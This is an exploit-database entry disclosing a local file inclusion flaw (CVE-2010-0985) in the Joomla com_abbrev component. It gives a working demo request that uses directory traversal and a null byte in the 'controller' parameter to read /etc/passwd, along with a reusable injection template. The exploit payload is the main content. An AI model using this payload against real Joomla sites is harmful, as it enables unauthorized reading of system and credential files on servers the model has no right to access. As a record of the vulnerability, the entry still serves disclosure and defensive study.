Joomla! Component com_abbrev - Local File Inclusion
Author: FL0RiX
type: webapps
platform: php
port:
date_added: 2010-01-02
date_updated:
verified: 1
codes: OSVDB-61458;CVE-2010-0985
tags:
aliases:
screenshot_url:
application_url:
<------------------- header data start ------------------- >
[++] Joomla Component com_abbrev Local File Inclusion Vulnerability
[++] author : FL0RiX
[++] Name : com_abbrev
[++] Bug Type : Local File Inclusion
[++] Demo Vuln. :
[++] http://server/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
[++] Note : LFI/RFI Uzmanı Zannedenler Localda Aramazlar :)
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_abbrev&controller=[-LFI-]
< -- bug code end of -- >